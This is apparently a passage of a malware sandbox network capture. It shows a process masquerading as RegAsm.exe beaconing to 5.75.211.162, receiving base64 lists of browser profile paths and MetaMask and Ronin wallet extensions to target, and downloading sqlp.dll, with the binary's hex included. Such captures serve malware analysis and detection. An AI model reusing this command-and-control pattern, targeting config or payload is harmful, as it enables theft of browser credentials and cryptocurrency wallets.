2024-09-26 20:56:24 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 33 41 45 31 38 34 44 42 37 36 37 31 38 34 37 36 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 2d 2d 0d 0a Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="hwid"7CD3AE184DB7671847631-a33c7340-61ca------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------DAEGIIECGHCBFHJKEHDB--
2024-09-26 20:56:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:25 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|c23616f78b6302a293c82e3501b7036e\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:26 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:26 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------KKFHJJDHJEGHJKECBGCFCont
2024-09-26 20:56:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:26 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:27 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IIEBAFCBKFIDGCAKKKFCCont
2024-09-26 20:56:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:28 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:28 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:28 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------DHCBAEHJJJKKFIDGHJECCont
2024-09-26 20:56:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:29 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:30 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6269 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:30 UTC	6269	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------AEGIJKEHCAKFCAKFHDAACont
2024-09-26 20:56:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:31 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:31 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:31 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:31 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:31 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 20:56:31 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
